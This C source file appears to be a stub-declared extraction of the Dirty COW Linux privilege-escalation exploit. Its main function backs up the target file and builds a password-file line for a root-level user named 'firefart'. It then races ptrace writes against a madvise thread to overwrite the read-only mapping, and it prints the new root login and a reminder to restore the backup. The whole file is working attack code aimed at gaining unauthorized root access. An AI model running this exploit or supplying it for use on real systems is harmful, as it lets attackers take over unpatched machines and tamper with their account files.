
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_3__ TYPE_1__ ;


struct Userinfo {char* username; char* info; char* home_dir; char* shell; int hash; scalar_t__ group_id; scalar_t__ user_id; } ;
struct TYPE_3__ {scalar_t__ st_size; } ;


 int MAP_PRIVATE ;
 int O_RDONLY ;
 int PROT_READ ;
 int PTRACE_POKETEXT ;
 int PTRACE_TRACEME ;
 int SIGSTOP ;
 char* backup_filename ;
 int copy_file (char*,char*) ;
 int exit (int) ;
 int f ;
 char* filename ;
 scalar_t__ fork () ;
 int fstat (int ,TYPE_1__*) ;
 char* generate_passwd_line (struct Userinfo) ;
 int generate_password_hash (char*) ;
 char* getpass (char*) ;
 int getpid () ;
 int kill (int ,int ) ;
 int madviseThread ;
 scalar_t__ map ;
 scalar_t__ mmap (int *,scalar_t__,int ,int ,int ,int ) ;
 int open (char*,int ) ;
 scalar_t__ pid ;
 int printf (char*,...) ;
 int pth ;
 int pthread_create (int *,int *,int ,int *) ;
 int pthread_join (int ,int *) ;
 scalar_t__ ptrace (int ,...) ;
 TYPE_1__ st ;
 int strlen (char*) ;
 int waitpid (scalar_t__,int *,int ) ;

int main(int argc, char *argv[])
{

  int ret = copy_file(filename, backup_filename);
  if (ret != 0) {
    exit(ret);
  }

  struct Userinfo user;

  user.username = "firefart";
  user.user_id = 0;
  user.group_id = 0;
  user.info = "pwned";
  user.home_dir = "/root";
  user.shell = "/bin/bash";

  char *plaintext_pw;

  if (argc >= 2) {
    plaintext_pw = argv[1];
    printf("Please enter the new password: %s\n", plaintext_pw);
  } else {
    plaintext_pw = getpass("Please enter the new password: ");
  }

  user.hash = generate_password_hash(plaintext_pw);
  char *complete_passwd_line = generate_passwd_line(user);
  printf("Complete line:\n%s\n", complete_passwd_line);

  f = open(filename, O_RDONLY);
  fstat(f, &st);
  map = mmap(((void*)0),
             st.st_size + sizeof(long),
             PROT_READ,
             MAP_PRIVATE,
             f,
             0);
  printf("mmap: %lx\n",(unsigned long)map);
  pid = fork();
  if(pid) {
    waitpid(pid, ((void*)0), 0);
    int u, i, o, c = 0;
    int l=strlen(complete_passwd_line);
    for(i = 0; i < 10000/l; i++) {
      for(o = 0; o < l; o++) {
        for(u = 0; u < 10000; u++) {
          c += ptrace(PTRACE_POKETEXT,
                      pid,
                      map + o,
                      *((long*)(complete_passwd_line + o)));
        }
      }
    }
    printf("ptrace %d\n",c);
  }
  else {
    pthread_create(&pth,
                   ((void*)0),
                   madviseThread,
                   ((void*)0));
    ptrace(PTRACE_TRACEME);
    kill(getpid(), SIGSTOP);
    pthread_join(pth,((void*)0));
  }

  printf("Done! Check %s to see if the new user was created.\n", filename);
  printf("You can log in with the username '%s' and the password '%s'.\n\n",
    user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
    backup_filename, filename);
  return 0;
}
